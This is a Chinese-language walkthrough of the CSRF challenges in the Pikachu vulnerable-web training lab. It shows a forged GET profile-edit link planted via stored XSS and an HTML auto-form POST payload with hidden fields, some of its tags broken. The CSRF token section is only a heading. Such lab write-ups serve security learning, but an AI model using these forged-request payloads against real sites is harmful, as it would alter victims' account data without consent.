pikachu靶场通关-CSRF跨站请求伪造

CSRF

0x00 跨站请求伪造

Cross-site request forgery 简称为“CSRF”,在CSRF的攻击场景中攻击者会伪造一个请求(这个请求一般是一个链接),然后欺骗目标用户进行点击,用户一旦点击了这个请求,整个 攻击就完成了。所以CSRF攻击也成为"one click"攻击。很多人搞不清楚CSRF的概念,甚至有时候会将其和XSS混淆,更有甚者会将其和越权问题混为一谈,这都是对原理没搞清楚导致的。

攻击者: allen---->123456

被攻击者: kobe---->123456

0x01 CSRF(get) login

前期埋点

1、攻击者登录后获取修改信息的链接http://XXXXX/pikachu/vul/csrf/csrfget/csrf_get_edit.php?sex=435434553&phonenum=136sad&add=4354343&email=345343&submit=submit

2、将链接通过存储型XSS存入网页中

pikachu靶场通关-CSRF跨站请求伪造_第1张图片

猎物上钩

1、受害者登录页面

2、浏览时发现攻击者埋的点,好奇心驱使他去点击

3、结果信息被修改

pikachu靶场通关-CSRF跨站请求伪造_第2张图片

0x02 CSRF(post) login

埋点

1、攻击者登录后通过存储型XSS埋点

post

pk_csrf.html内容:

<html>

<body>
<script>history.pushState('', '', '/')script>
 <form action="http://XXXXXX/pikachu/vul/csrf/csrfpost/csrf_post_edit.php" method="POST">
   <input type="hidden" name="sex" value="4354aa553" />
   <input type="hidden" name="phonenum" value="136sad" />
   <input type="hidden" name="add" value="435aaa3" />
   <input type="hidden" name="email" value="34aa43" />
   <input type="hidden" name="submit" value="suaait" />
   <input type="submit" value="Submit request" />
 form>
body>
html>

上钩

1、受害者登录页面

2、浏览时发现攻击者埋的点,好奇心驱使他去点击

3、结果信息被修改

pikachu靶场通关-CSRF跨站请求伪造_第3张图片

0x03 CSRF Token login

你可能感兴趣的:(pikachu靶场通关,csrf,web安全)